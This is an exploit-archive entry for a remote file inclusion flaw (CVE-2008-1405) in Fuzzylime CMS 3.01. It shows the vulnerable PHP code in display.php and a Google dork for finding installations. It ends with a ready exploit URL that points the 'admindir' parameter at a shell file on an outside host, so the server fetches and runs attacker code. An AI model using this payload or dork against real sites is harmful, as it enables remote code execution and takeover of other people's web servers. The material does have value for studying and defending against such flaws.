EXPLOITS

Fuzzylime CMS 3.01 - 'admindir' Remote File Inclusion

Author: irk4z
type: webapps
platform: php
port: 
date_added: 2008-03-13  
date_updated: 2016-11-16  
verified: 1  
codes: OSVDB-43223;CVE-2008-1405  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5260.txt  

.-----------------------------------------------------------------------------.
|  vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability           |
|  download: http://cms.fuzzylime.co.uk/                                      |
|  dork: "powered by fuzzylime"                                               |
|                                                                             |
|  author: irk4z@yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|  greets to: cOndemned, str0ke, wacky                                        |
'-----------------------------------------------------------------------------'

# code:

  /code/display.php:
  ...
1    <?
2    $s = $_GET[s];
3    $p = $_GET[p];
4    $s = str_replace("../", "", $s);
5    $p = str_replace("../", "", $p);
6    if(empty($s)) $s = "front";
7    if(empty($p)) $p = "index";
8    $curs = $s;
9    $curp = $p;
10
11   include "code/settings.inc.php";
12   include "${admindir}/languages/english.inc.php";
 ...

 line 11: ./code/code/settings.inc.php not exists so $admindir is empty :D:D

# exploit:

 http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt?

# milw0rm.com [2008-03-14]